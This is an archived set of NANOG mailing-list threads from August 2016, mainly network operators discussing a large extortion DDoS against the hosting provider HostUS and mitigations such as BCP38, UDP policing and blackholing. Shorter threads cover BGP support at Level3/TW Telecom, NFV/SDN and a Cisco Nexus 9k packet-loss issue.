Midwest-IX http://www.midwest-ix.com ----- Original Message ----- From: "James Bensley" To: nanog at nanog.org Sent: Wednesday, August 3, 2016 9:40:17 AM Subject: Re: Host.us DDOS attack -and- related conversations On 3 August 2016 at 15:16, Alain Hebert wrote: > PS: > > I will like to take this time to underline the lack of > participation from a vast majority of ISPs into BCP38 and the like. We > need to keep educating them at every occasion we have. > > For those that actually implemented some sort of tech against > it, you are a beacon of hope in what is a ridiculous situation that has > been happening for more than 15 years. At the risk of starting a "NANOG war" [1], BCP isn't a magic wand. If I find a zero day in the nasty customised kernels that OVH run on their clients boxes, I only need 300 compromised hosts to send 300Gbps of traffic without spoofing the IP or using amplification attacks [2]. I can rent a server with a 10Gbps connection for 1 hour for a few quid/dollars. I could generate hundreds of Gbps of traffic for about ?1000 from legitimate IPs, paid for with stolen card details. How will BCP save you then? Can everyone stop praising it like it was a some magic bullet? James. [1] A pathetic and futile one, so different from the rest. [2] Subsitute OVH for any half decent provider that isn't really oversubscribed. From nanog at ics-il.net Wed Aug 3 15:12:42 2016 From: nanog at ics-il.net (Mike Hammett) Date: Wed, 3 Aug 2016 10:12:42 -0500 (CDT) Subject: Host.us DDOS attack -and- related conversations In-Reply-To: References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> <523ec90d-f3d7-22a7-af03-74032b27bfe8@pubnix.net> Message-ID: <2131346548.14573.1470237159642.JavaMail.mhammett@ThunderFuck> As discussed a few months ago (maybe Christmas time?), Comcast is actively suspending accounts involved in DNS amplification. Certainly on a network like theirs, it's an internal issue as well. ----- Mike Hammett Intelligent Computing Solutions http://www.ics-il.com Midwest-IX http://www.midwest-ix.com ----- Original Message ----- From: "Ca By" To: ahebert at pubnix.net Cc: nanog at nanog.org Sent: Wednesday, August 3, 2016 10:05:04 AM Subject: Re: Host.us DDOS attack -and- related conversations On Wednesday, August 3, 2016, Alain Hebert wrote: > Well, > > I'm sorry. > > That sound like the CloudFlare argument: You cannot fix the DDoSs > at the source because Elbonia can do it. The only solution is to pay > for protection. > > No. I hate the idea of paying for protection from a cloud or appliance. Elbonia just has the trigger. The loaded gun is the ddos reflector in comcast, cox, vz, and everyone else. > Between you and me, if only Elbonia are left DDoSing at 100Gbps, we > simply de-peer the commercial subnets from that country (leaving the > govt subnets up obviously) and see for them to deal with their trash > ISPs once for all. ( That's how we used to do it early on when the IIRC > flooding started ). > > There are known problematic networks. I have not seen any of them or their facilitating upstreams depeered. I can name 4 networks that source 75% of my attack attack traffic. Comcast was one due to their ssdp reflection, they stopped that now. But still lots of dns attacks from them. Or we keep getting DDoSed for the next 100+ years. > > On that track. > PS: Yes, the fictional country from the Dilbert syndicated cartoons. > > > Swap in your favorite real world country / network that has very real abuse source reputation. > On a humorous note: > > The DDoS protection lobby is our NRA. > > ----- > Alain Hebert ahebert at pubnix.net > > PubNIX Inc. > 50 boul. St-Charles > P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 > Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 > > On 08/03/16 10:36, Ca By wrote: > > On Wednesday, August 3, 2016, Alain Hebert > wrote: > > > >> Well, > >> > >> > >> Could it be related to the last 2 days DDoS of PokemonGO (which > >> failed) and some other gaming sites (Blizzard and Steam)? > >> > >> > >> And on the subject of CloudFlare, I'm sorry for that CloudFlare > >> person that defended their position earlier this week, but there may be > >> more hints (unverified) against your statements: > >> > >> https://twitter.com/xotehpoodle/status/756850023896322048 > >> > >> That could be explored. > >> > >> > >> On top of which there is hints (unverified) on which is the real bad > >> actor behind that new DDoS service: > >> > >> > >> > >> > http://news.softpedia.com/news/pokemon-go-ddos-attacks-postponed-as-poodlecorp-botnet-suffers-security-breach-506910.shtml > >> > >> > >> And I quote: > >> > >> "One thing LeakedSource staff spotted was that the first payment > >> recorded in the botnet's control panel was of $1, while payments for the > >> same package plan were of $19.99." > >> > >> ( Paypal payments btw ) > >> > >> > >> There is enough information, and damages, imho, to start looking for > >> the people responsible from a legal standpoint. And hopefully the > >> proper authorities are interested. > >> > >> PS: > >> > >> I will like to take this time to underline the lack of > >> participation from a vast majority of ISPs into BCP38 and the like. We > >> need to keep educating them at every occasion we have. > >> > >> For those that actually implemented some sort of tech against > >> it, you are a beacon of hope in what is a ridiculous situation that has > >> been happening for more than 15 years. > >> > >> > > Bcp38 is not the issue. It is only the trigger, and as long as one > network > > in Elbonia allows spoofs, that one network can marshall 100s of gbs of > > ddos power. Years of telling people to do bcp38 has not worked. > > > > The issue is for you and your neighbor to turn off your reflecting udp > > amplifiers (open dns relay, ssdp, ntp, chargen) and generously block > > obvious ddos traffic. A healthy udp policer is also smart. I suggest > > taking a baseline of your normal peak udp traffic, and build a policer > that > > drops all udp that is 10x the baseline for bw and pps. > > > > Bcp38 is good, but it is not the solution we need to tactically stop > > attacks. > > > > This is not pretty. But it works at keeping your network up. > > > > CB > > > > > > ----- > >> Alain Hebert ahebert at pubnix.net > > >> > >> PubNIX Inc. > >> 50 boul. St-Charles > >> P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 > >> Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 > >> > >> On 08/03/16 09:41, Robert Webb wrote: > >>> Anyone have any additonal info on a DDOS attack hitting host.us? > >>> > >>> Woke up to no email this morning and the following from their web site: > >>> > >>> > >>> > >>> *Following an extortion attempt, HostUS is currently experiencing > >> sustained > >>> large-scale DDOS attacks against a number of locations. The attacks > were > >>> measured in one location at 300Gbps. In another location the attacks > >>> temporarily knocked out the entire metropolitan POP for a Tier-1 > >> provider. > >>> Please be patient. We will return soon. Your understanding is > >> appreciated. > >>> * > >>> > >>> > >>> >From my monitoring system, looks like my VPS went unavailable around > >> 23:00 > >>> EDT last night. > >>> > >>> Robert > >>> > >> > > From mel at beckman.org Wed Aug 3 16:01:05 2016 From: mel at beckman.org (Mel Beckman) Date: Wed, 3 Aug 2016 16:01:05 +0000 Subject: Clueful BGP from TW-Telecom/L3 In-Reply-To: <6463BEF1-546E-41D3-8ABB-C7058BC55D2D@emanon.com> References: <6463BEF1-546E-41D3-8ABB-C7058BC55D2D@emanon.com> Message-ID: We recently had a similar case and had to solve the problem by working with IO and another provider outside of Level3. We got the same Level3 instruction to install various community strings, and when that didn?t work their response was basically ?oh, well.? We have jury rigged a fix by trial and error, and Level3 says they will converge the Level3 and TWTelecom networks in a couple months. Whether that means an ASN change I don?t know. -mel > On Aug 3, 2016, at 7:32 AM, Scott Morris wrote: > > Yeah, considering that I STILL haven?t managed to get anyone in their supposed ?Tier 3? group to call back on the open case is just completely baffling to me. And with the Level 3 side, I?ve tried all sorts of different communities they supposedly use only to find that other policies override how those are treated along the way. I just don?t understand how customer support can be such a difficult thing. > > Scott > > From: Micah Croff > Date: Tuesday, July 26, 2016 at 6:21 PM > To: Scott Morris > Cc: "nanog at nanog.org" > Subject: Re: Clueful BGP from TW-Telecom/L3 > > Last I dealt with TW Telecom and BGP we had to explain to them that putting in a static route on both routers on top of BGP was not desired. Then they reconfigured a circuit 30 miles away when trying to turn it up again causing an outage in our data center. > > Sorry, not super hopeful when it comes to TW Telecom. > > Micah > > On Mon, Jul 25, 2016 at 8:51 PM, Scott Morris wrote: > Is there per chance anyone hanging on here who is clueful about BGP working with TW-Telecom and the recent integration with Level3???? > > I have a client that I consult with whose route is not getting sent from TW to L3 and the techs on the case are convinced we need to put different BGP communities in (both to TW link and other provider link) which of course we are putting in to satisfy them, but magically it is not working. This SHOULD be an easy thing to figure out using the Looking Glass servers within both TW and Level3, but this concept is lost on techs we are dealing with. > > Anyone internal there who can contact me off-list would be greatly appreciated! > > Scott > swm at emanon.com > > > > > > From rwfireguru at gmail.com Wed Aug 3 16:04:50 2016 From: rwfireguru at gmail.com (Robert Webb) Date: Wed, 3 Aug 2016 12:04:50 -0400 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Message-ID: Thanks for that link. My host is sitting in Atlanta and I believe that Atlanta hosts their main infrastructure. I am seeing around a 12 or 13 hour outage at this point. Robert On Wed, Aug 3, 2016 at 11:08 AM, Soon Keat Neo wrote: > Back on topic about HostUS, I've been following a thread on LowEndTalk > where seemingly Alexander's been updating ( > https://www.lowendtalk.com/discussion/comment/1791998/#Comment_1791998) - > seems like Atlanta and LA are still down ATM based on latest reports - > nearly 10 hours now. > > Tks. > > Regards, > Neo Soon Keat > > > > 2016-08-03 22:28 GMT+08:00 Robert Webb : > >> Apologies to all as the hostname in my subject is incorrect. >> >> It should be hostus.us... >> >> >> >> On Wed, Aug 3, 2016 at 10:25 AM, Robert Webb >> wrote: >> >> > Not sure if it is related to the PokemonGO or not. This started around >> > 23:00 EDT last night per my monitoring. >> > >> > Seems like a pretty big attack at 300Gbps and to also temporarily take a >> > down a Tier 1 POP in a major city. >> > >> > I was interested as to if this might be a botnet or some type of >> > reflection attack. >> > >> > >> > Robert >> > >> > On Wed, Aug 3, 2016 at 10:16 AM, Alain Hebert >> wrote: >> > >> >> Well, >> >> >> >> >> >> Could it be related to the last 2 days DDoS of PokemonGO (which >> >> failed) and some other gaming sites (Blizzard and Steam)? >> >> >> >> >> >> And on the subject of CloudFlare, I'm sorry for that CloudFlare >> >> person that defended their position earlier this week, but there may be >> >> more hints (unverified) against your statements: >> >> >> >> https://twitter.com/xotehpoodle/status/756850023896322048 >> >> >> >> That could be explored. >> >> >> >> >> >> On top of which there is hints (unverified) on which is the real >> bad >> >> actor behind that new DDoS service: >> >> >> >> >> >> >> >> >> http://news.softpedia.com/news/pokemon-go-ddos-attacks-postponed-as-poodlecorp-botnet-suffers-security-breach-506910.shtml >> >> >> >> >> >> And I quote: >> >> >> >> "One thing LeakedSource staff spotted was that the first >> payment >> >> recorded in the botnet's control panel was of $1, while payments for >> the >> >> same package plan were of $19.99." >> >> >> >> ( Paypal payments btw ) >> >> >> >> >> >> There is enough information, and damages, imho, to start looking >> for >> >> the people responsible from a legal standpoint. And hopefully the >> >> proper authorities are interested. >> >> >> >> PS: >> >> >> >> I will like to take this time to underline the lack of >> >> participation from a vast majority of ISPs into BCP38 and the like. We >> >> need to keep educating them at every occasion we have. >> >> >> >> For those that actually implemented some sort of tech against >> >> it, you are a beacon of hope in what is a ridiculous situation that has >> >> been happening for more than 15 years. >> >> >> >> ----- >> >> Alain Hebert ahebert at pubnix.net >> >> PubNIX Inc. >> >> 50 boul. St-Charles >> >> P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 >> >> Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 >> >> >> >> On 08/03/16 09:41, Robert Webb wrote: >> >> > Anyone have any additonal info on a DDOS attack hitting host.us? >> >> > >> >> > Woke up to no email this morning and the following from their web >> site: >> >> > >> >> > >> >> > >> >> > *Following an extortion attempt, HostUS is currently experiencing >> >> sustained >> >> > large-scale DDOS attacks against a number of locations. The attacks >> were >> >> > measured in one location at 300Gbps. In another location the attacks >> >> > temporarily knocked out the entire metropolitan POP for a Tier-1 >> >> provider. >> >> > Please be patient. We will return soon. Your understanding is >> >> appreciated. >> >> > * >> >> > >> >> > >> >> > >From my monitoring system, looks like my VPS went unavailable around >> >> 23:00 >> >> > EDT last night. >> >> > >> >> > Robert >> >> > >> >> >> >> >> > >> > > From deleskie at gmail.com Wed Aug 3 16:11:18 2016 From: deleskie at gmail.com (jim deleskie) Date: Wed, 3 Aug 2016 13:11:18 -0300 Subject: NFV Solution Evaluation Methodology In-Reply-To: References: Message-ID: I struggled with this whole SDN/NVF/insert marketing term for a while at first, until I sat down and actually though about. When I strip away all the foo, what I'm left with is breaking things down to pieces and and putting logo blocks together in a way that best suits what I'm doing. It is really going back to the way things were a long time ago in the days of 12/2400 baud models and 56k frame relay. It doesn't help vendors vendors that want to sell you over priced foo for features you don't really need. It lets you, if you have clue build your own right bits. It will see some vendors evolve, new vendors of their brand of foo appear and some vendors die, but end of day, its no different then most of were doing back in the "good ol days" -jim On Wed, Aug 3, 2016 at 11:27 AM, Christopher Morrow wrote: > On Wed, Aug 3, 2016 at 8:20 AM, Ca By wrote: > > > > > > > On Wednesday, August 3, 2016, Randy Bush wrote: > > > >> > but, NFV isn't necessarily 'cloud'... It CAN BE taking purpose built > >> > appliance garbage that can't scale in a cost effective manner and > >> > replacing it with some software solution on 'many' commodity > >> > unix-like-hosts that can scale horizontally. > >> > >> my main worry about nfv is when they need more forwarding horsepower > >> than the household appliance has, and the data plan is is moved > >> > > > this is a scaling problem, and one which points to the need to not do 'all > of one thing' ('all nfv will solve us!') you may still need other methods > to load balance or deal with loads which are higher than the nfv > platform(s) can deal with properly. > > In some sense this is the same problem as trying to push too many pps > through a linecard which you know has a limit lower than line-rate. > > > > out of the control plane and they are not congruent. we've had too many > >> lessons debugging this situation (datakit, atm, ...). > >> > >> > seperation of data/control plane ... does require knowledge about what you > are doing and has clear implications on toolling, troubleshooting, etc. > > To some extent this mirrors anycast dns deployment problems. "I made a much > more complex system, though from the outside perhaps it doesn't appear any > different." be prepared for interesting times. > > > > Sdn is like authoritarianism and divine creation rolled up into one and > > sold at 20% premium to easily duped telco types that want to travel to > > endless conferences > > > > > Sure, you have to know what you are doing/buying... magic doesn't exist in > this space. > > > > > > > >> beyond that, i am not sure i see that much difference whether it's a > >> YFRV or a SuperMicro. but i sure wish bird and quagga had solid is-is, > >> supported communities, ... > >> > >> randy > >> > > > From critellia at gmail.com Tue Aug 2 18:45:46 2016 From: critellia at gmail.com (Anthony Critelli) Date: Tue, 2 Aug 2016 14:45:46 -0400 Subject: Nexus 9k, packet loss through switch on vlan without SVI In-Reply-To: References: Message-ID: I'd also be inclined toward quirky 9k internals. I believe a colleague of mine troubleshot an issue with latency/slowness through some Nexus switches (I can't recall if they were 9ks). After engaging TAC, they noticed that "no ip redirects" was applied to the VLAN 1 SVI but none of the other SVIs. While it theoretically shouldn't have made any difference, they applied "no ip redirects" to the rest of the SVIs and everything started working just fine. Sincerely, Anthony Critelli B.S. Applied Networking and Systems Administration, 2014 www.acritelli.com (845) 283-4117 On Sun, Jul 24, 2016 at 12:32 PM, Jeremy wrote: > Running into some weird issues with a Cisco Nexus9k. > > We have a Cisco 3750X pair stacked, port channel (2x 1G) to a two different > blades on a Nexus9k. Isolating the links of the port channel , on one link > we can consistently get 800mbps (using iperf), or the other link we > consistently get ~34mbps. > > we have seen this across multiple 3750X stacks. > > The vlan we were on is just layer2 through the n9k, there are no IP > addresses. We were able to (apparently) resolve this issue by creating an > SVI on the n9k, with an empty config. > > Now, even isolating links we can get ~800mbps across the n9k, through the > various 3750X stacks. > > I am confused why creating the SVI would have an impact on this, and why it > wouldn't be consistent across both links. If the lack of SVI were at fault, > I would be less surprised if it just flat out didn't work, but this partial > working state feels very odd. > > Anyone else seen this? Thoughts? Could traffic be hitting the CPU while > going across modules? This feels like quirky n9k internals... > > Thanks! > Jeremy > > PS: no CRC errors found on interfaces, all looked clean > From neo at soonke.at Wed Aug 3 15:08:53 2016 From: neo at soonke.at (Soon Keat Neo) Date: Wed, 3 Aug 2016 23:08:53 +0800 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Message-ID: Back on topic about HostUS, I've been following a thread on LowEndTalk where seemingly Alexander's been updating ( https://www.lowendtalk.com/discussion/comment/1791998/#Comment_1791998) - seems like Atlanta and LA are still down ATM based on latest reports - nearly 10 hours now. Tks. Regards, Neo Soon Keat 2016-08-03 22:28 GMT+08:00 Robert Webb : > Apologies to all as the hostname in my subject is incorrect. > > It should be hostus.us... > > > > On Wed, Aug 3, 2016 at 10:25 AM, Robert Webb wrote: > > > Not sure if it is related to the PokemonGO or not. This started around > > 23:00 EDT last night per my monitoring. > > > > Seems like a pretty big attack at 300Gbps and to also temporarily take a > > down a Tier 1 POP in a major city. > > > > I was interested as to if this might be a botnet or some type of > > reflection attack. > > > > > > Robert > > > > On Wed, Aug 3, 2016 at 10:16 AM, Alain Hebert > wrote: > > > >> Well, > >> > >> > >> Could it be related to the last 2 days DDoS of PokemonGO (which > >> failed) and some other gaming sites (Blizzard and Steam)? > >> > >> > >> And on the subject of CloudFlare, I'm sorry for that CloudFlare > >> person that defended their position earlier this week, but there may be > >> more hints (unverified) against your statements: > >> > >> https://twitter.com/xotehpoodle/status/756850023896322048 > >> > >> That could be explored. > >> > >> > >> On top of which there is hints (unverified) on which is the real bad > >> actor behind that new DDoS service: > >> > >> > >> > >> > http://news.softpedia.com/news/pokemon-go-ddos-attacks-postponed-as-poodlecorp-botnet-suffers-security-breach-506910.shtml > >> > >> > >> And I quote: > >> > >> "One thing LeakedSource staff spotted was that the first payment > >> recorded in the botnet's control panel was of $1, while payments for the > >> same package plan were of $19.99." > >> > >> ( Paypal payments btw ) > >> > >> > >> There is enough information, and damages, imho, to start looking for > >> the people responsible from a legal standpoint. And hopefully the > >> proper authorities are interested. > >> > >> PS: > >> > >> I will like to take this time to underline the lack of > >> participation from a vast majority of ISPs into BCP38 and the like. We > >> need to keep educating them at every occasion we have. > >> > >> For those that actually implemented some sort of tech against > >> it, you are a beacon of hope in what is a ridiculous situation that has > >> been happening for more than 15 years. > >> > >> ----- > >> Alain Hebert ahebert at pubnix.net > >> PubNIX Inc. > >> 50 boul. St-Charles > >> P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 > >> Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 > >> > >> On 08/03/16 09:41, Robert Webb wrote: > >> > Anyone have any additonal info on a DDOS attack hitting host.us? > >> > > >> > Woke up to no email this morning and the following from their web > site: > >> > > >> > > >> > > >> > *Following an extortion attempt, HostUS is currently experiencing > >> sustained > >> > large-scale DDOS attacks against a number of locations. The attacks > were > >> > measured in one location at 300Gbps. In another location the attacks > >> > temporarily knocked out the entire metropolitan POP for a Tier-1 > >> provider. > >> > Please be patient. We will return soon. Your understanding is > >> appreciated. > >> > * > >> > > >> > > >> > >From my monitoring system, looks like my VPS went unavailable around > >> 23:00 > >> > EDT last night. > >> > > >> > Robert > >> > > >> > >> > > > From Valdis.Kletnieks at vt.edu Wed Aug 3 17:09:29 2016 From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu) Date: Wed, 03 Aug 2016 13:09:29 -0400 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: <523ec90d-f3d7-22a7-af03-74032b27bfe8@pubnix.net> References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> <523ec90d-f3d7-22a7-af03-74032b27bfe8@pubnix.net> Message-ID: <13188.1470244169@turing-police.cc.vt.edu> On Wed, 03 Aug 2016 10:53:22 -0400, Alain Hebert said: > Between you and me, if only Elbonia are left DDoSing at 100Gbps, we > simply de-peer the commercial subnets from that country (leaving the > govt subnets up obviously) Explain why, for those of us who don't see it as obvious. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 848 bytes Desc: not available URL: From morrowc.lists at gmail.com Wed Aug 3 20:16:06 2016 From: morrowc.lists at gmail.com (Christopher Morrow) Date: Wed, 3 Aug 2016 16:16:06 -0400 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Message-ID: it's good that there aren't any easy solutions to this sort of problem... wait... that's wrong, there are. On Wed, Aug 3, 2016 at 12:04 PM, Robert Webb wrote: > Thanks for that link. My host is sitting in Atlanta and I believe that > Atlanta hosts their main infrastructure. > > I am seeing around a 12 or 13 hour outage at this point. > > Robert > > On Wed, Aug 3, 2016 at 11:08 AM, Soon Keat Neo wrote: > > > Back on topic about HostUS, I've been following a thread on LowEndTalk > > where seemingly Alexander's been updating ( > > https://www.lowendtalk.com/discussion/comment/1791998/#Comment_1791998) > - > > seems like Atlanta and LA are still down ATM based on latest reports - > > nearly 10 hours now. > > > > Tks. > > > > Regards, > > Neo Soon Keat > > > > > > > > 2016-08-03 22:28 GMT+08:00 Robert Webb : > > > >> Apologies to all as the hostname in my subject is incorrect. > >> > >> It should be hostus.us... > >> > >> > >> > >> On Wed, Aug 3, 2016 at 10:25 AM, Robert Webb > >> wrote: > >> > >> > Not sure if it is related to the PokemonGO or not. This started around > >> > 23:00 EDT last night per my monitoring. > >> > > >> > Seems like a pretty big attack at 300Gbps and to also temporarily > take a > >> > down a Tier 1 POP in a major city. > >> > > >> > I was interested as to if this might be a botnet or some type of > >> > reflection attack. > >> > > >> > > >> > Robert > >> > > >> > On Wed, Aug 3, 2016 at 10:16 AM, Alain Hebert > >> wrote: > >> > > >> >> Well, > >> >> > >> >> > >> >> Could it be related to the last 2 days DDoS of PokemonGO (which > >> >> failed) and some other gaming sites (Blizzard and Steam)? > >> >> > >> >> > >> >> And on the subject of CloudFlare, I'm sorry for that CloudFlare > >> >> person that defended their position earlier this week, but there may > be > >> >> more hints (unverified) against your statements: > >> >> > >> >> https://twitter.com/xotehpoodle/status/756850023896322048 > >> >> > >> >> That could be explored. > >> >> > >> >> > >> >> On top of which there is hints (unverified) on which is the real > >> bad > >> >> actor behind that new DDoS service: > >> >> > >> >> > >> >> > >> >> > >> > http://news.softpedia.com/news/pokemon-go-ddos-attacks-postponed-as-poodlecorp-botnet-suffers-security-breach-506910.shtml > >> >> > >> >> > >> >> And I quote: > >> >> > >> >> "One thing LeakedSource staff spotted was that the first > >> payment > >> >> recorded in the botnet's control panel was of $1, while payments for > >> the > >> >> same package plan were of $19.99." > >> >> > >> >> ( Paypal payments btw ) > >> >> > >> >> > >> >> There is enough information, and damages, imho, to start looking > >> for > >> >> the people responsible from a legal standpoint. And hopefully the > >> >> proper authorities are interested. > >> >> > >> >> PS: > >> >> > >> >> I will like to take this time to underline the lack of > >> >> participation from a vast majority of ISPs into BCP38 and the like. > We > >> >> need to keep educating them at every occasion we have. > >> >> > >> >> For those that actually implemented some sort of tech against > >> >> it, you are a beacon of hope in what is a ridiculous situation that > has > >> >> been happening for more than 15 years. > >> >> > >> >> ----- > >> >> Alain Hebert ahebert at pubnix.net > >> >> PubNIX Inc. > >> >> 50 boul. St-Charles > >> >> P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 > >> >> Tel: 514-990-5911 http://www.pubnix.net Fax: 514-990-9443 > >> >> > >> >> On 08/03/16 09:41, Robert Webb wrote: > >> >> > Anyone have any additonal info on a DDOS attack hitting host.us? > >> >> > > >> >> > Woke up to no email this morning and the following from their web > >> site: > >> >> > > >> >> > > >> >> > > >> >> > *Following an extortion attempt, HostUS is currently experiencing > >> >> sustained > >> >> > large-scale DDOS attacks against a number of locations. The attacks > >> were > >> >> > measured in one location at 300Gbps. In another location the > attacks > >> >> > temporarily knocked out the entire metropolitan POP for a Tier-1 > >> >> provider. > >> >> > Please be patient. We will return soon. Your understanding is > >> >> appreciated. > >> >> > * > >> >> > > >> >> > > >> >> > >From my monitoring system, looks like my VPS went unavailable > around > >> >> 23:00 > >> >> > EDT last night. > >> >> > > >> >> > Robert > >> >> > > >> >> > >> >> > >> > > >> > > > > > From tony at wicks.co.nz Wed Aug 3 21:10:18 2016 From: tony at wicks.co.nz (Tony Wicks) Date: Thu, 4 Aug 2016 09:10:18 +1200 Subject: Host.us DDOS attack In-Reply-To: References: Message-ID: <007301d1edcb$7191ce60$54b56b20$@wicks.co.nz> Interestingly my VM (LA) with them has been effectively down for half a day as far as IPv4 is concerned. IPv6 traffic seems unaffected. -----Original Message----- From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Robert Webb Sent: Thursday, 4 August 2016 1:42 AM To: NANOG list Subject: Host.us DDOS attack Anyone have any additonal info on a DDOS attack hitting host.us? Woke up to no email this morning and the following from their web site: From tony at wicks.co.nz Wed Aug 3 21:27:57 2016 From: tony at wicks.co.nz (Tony Wicks) Date: Thu, 4 Aug 2016 09:27:57 +1200 Subject: Host.us DDOS attack In-Reply-To: <007301d1edcb$7191ce60$54b56b20$@wicks.co.nz> References: <007301d1edcb$7191ce60$54b56b20$@wicks.co.nz> Message-ID: <007501d1edcd$e87b7a60$b9726f20$@wicks.co.nz> Further to that, and I would suggest it should be part of the overall discussion here. It appears the IPv4 IP block my VM is in is not currently advertised on the world route table. I assume hostus.us's transit provider has dropped their ipv4 BGP to save themselves. This is really the ultimate reward for the extortionists as they don't even need to sustain the DDOS to attack their target. While I see the transit providers point of view, it?s a pretty shitty situation for their customer, and their customers/customers. -----Original Message----- From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Tony Wicks Sent: Thursday, 4 August 2016 9:10 AM To: 'NANOG list' Subject: RE: Host.us DDOS attack Interestingly my VM (LA) with them has been effectively down for half a day as far as IPv4 is concerned. IPv6 traffic seems unaffected. From jason at unlimitednet.us Wed Aug 3 21:31:27 2016 From: jason at unlimitednet.us (Jason Canady) Date: Wed, 3 Aug 2016 17:31:27 -0400 Subject: Host.us DDOS attack In-Reply-To: <007501d1edcd$e87b7a60$b9726f20$@wicks.co.nz> References: <007301d1edcb$7191ce60$54b56b20$@wicks.co.nz> <007501d1edcd$e87b7a60$b9726f20$@wicks.co.nz> Message-ID: Strange that they cannot send a BGP blackhole upstream to keep everyone else online within their advertised route. On 8/3/16 5:27 PM, Tony Wicks wrote: > Further to that, and I would suggest it should be part of the overall discussion here. It appears the IPv4 IP block my VM is in is not currently advertised on the world route table. I assume hostus.us's transit provider has dropped their ipv4 BGP to save themselves. This is really the ultimate reward for the extortionists as they don't even need to sustain the DDOS to attack their target. While I see the transit providers point of view, it?s a pretty shitty situation for their customer, and their customers/customers. > > > > -----Original Message----- > From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Tony Wicks > Sent: Thursday, 4 August 2016 9:10 AM > To: 'NANOG list' > Subject: RE: Host.us DDOS attack > > Interestingly my VM (LA) with them has been effectively down for half a day as far as IPv4 is concerned. IPv6 traffic seems unaffected. > > > > > > From mark.tinka at seacom.mu Thu Aug 4 06:20:58 2016 From: mark.tinka at seacom.mu (Mark Tinka) Date: Thu, 4 Aug 2016 08:20:58 +0200 Subject: NFV Solution Evaluation Methodology In-Reply-To: References: Message-ID: <51fc7ceb-ed11-4b88-64ee-d88925399908@seacom.mu> On 3/Aug/16 18:11, jim deleskie wrote: > I struggled with this whole SDN/NVF/insert marketing term for a while at > first, until I sat down and actually though about. When I strip away all > the foo, what I'm left with is breaking things down to pieces and and > putting logo blocks together in a way that best suits what I'm doing. It > is really going back to the way things were a long time ago in the days of > 12/2400 baud models and 56k frame relay. It doesn't help vendors vendors > that want to sell you over priced foo for features you don't really need. > It lets you, if you have clue build your own right bits. It will see some > vendors evolve, new vendors of their brand of foo appear and some vendors > die, but end of day, its no different then most of were doing back in the > "good ol days" The way I see it, the whole SDN/NFV talk has finally devolved into automation (separating the control and data plane is sooooo 2013). Automation is not new - a lot of networks have been automating for a long time now, albeit in custom ways that only worked for them... ummh, rephrase: was not tested in other networks. The reason I see SDN/NFV becoming a thing is just to have a standard way of automating. That's it. Mark. From phil.gardnerjr at gmail.com Wed Aug 3 16:40:11 2016 From: phil.gardnerjr at gmail.com (Phil Gardner) Date: Wed, 3 Aug 2016 12:40:11 -0400 Subject: Host.us DDOS attack -and- related conversations In-Reply-To: References: <056d8e33-e2f1-db9c-7148-095bd200f4e5@pubnix.net> Message-ID: One of my VPS with them is in Atlanta, and while the IPv4 address is unresponsive, the IPv6 address is working without issue. On 08/03/2016 11:08 AM, Soon Keat Neo wrote: > Back on topic about HostUS, I've been following a thread on LowEndTalk > where seemingly Alexander's been updating ( > https://www.lowendtalk.com/discussion/comment/1791998/#Comment_1791998) - > seems like Atlanta and LA are still down ATM based on latest reports - > nearly 10 hours now. > > Tks. > > Regards, > Neo Soon Keat > > > > 2016-08-03 22:28 GMT+08:00 Robert Webb : > >> Apologies to all as the hostname in my subject is incorrect. >> >> It should be hostus.us... >> >> >> >> On Wed, Aug 3, 2016 at 10:25 AM, Robert Webb wrote: >> >>> Not sure if it is related to the PokemonGO or not. This started around >>> 23:00 EDT last night per my monitoring. >>> >>> Seems like a pretty big attack at 300Gbps and to also temporarily take a >>> down a Tier 1 POP in a major city. >>> >>> I was interested as to if this might be a botnet or some type of >>> reflection attack. >>> >>> >>> Robert >>> >>> On Wed, Aug 3, 2016 at 10:16 AM, Alain Hebert >> wrote: >>> >>>> Well, >>>> >>>> >>>> Could it be related to the last 2 days DDoS of PokemonGO (which >>>> failed) and some other gaming sites (Blizzard and Steam)? >>>> >>>> >>>> And on the subject of CloudFlare, I'm sorry for that CloudFlare >>>> person that defended their position earlier this week, but there may be >>>> more hints (unverified) against your statements: >>>> >>>> https://twitter.com/xotehpoodle/status/756850023896322048 >>>> >>>> That could be explored. >>>> >>>> >>>> On top of which there is hints (unverified) on which is the real bad >>>> actor behind that new DDoS service: >>>> >>>> >>>> >>>> >> http://news.softpedia.com/news/pokemon-go-ddos-attacks-postponed-as-poodlecorp-botnet-suffers-security-breach-506910.shtml >>>> >>>> >>>> And I quote: >>>> >>>> "One thing LeakedSource staff spotted was that the first payment >>>> recorded in the botnet's control panel was of $1, while payments for the >>>> same package plan were of $19.99." >>>> >>>> ( Paypal payments btw ) >>>> >>>> >>>> There is enough information, and damages, imho, to start looking for >>>> the people responsible from a legal standpoint. And hopefully the >>>> proper authorities are interested. >>>> >>>> PS: >>>> >>>> I will like to take this time to underline the lack of >>>> participation from a vast majority of ISPs into BCP38 and the like. We >>>> need to keep educating them at every occasion we have. >>>> >>>> For those that actually implemented some sort of tech against >>>> it, you are a beacon of hope in what is a ridiculous situation that has >>>> been happening for more than 15 years. >>>> >>>> ----- >>>> Alain Hebert ahebert at pubnix.net >>>> PubNIX Inc. >>>> 50 boul. St-Charles >>>> P.O. Box 26770 Beaconsfield, Quebec H9W 6G7 >>>> 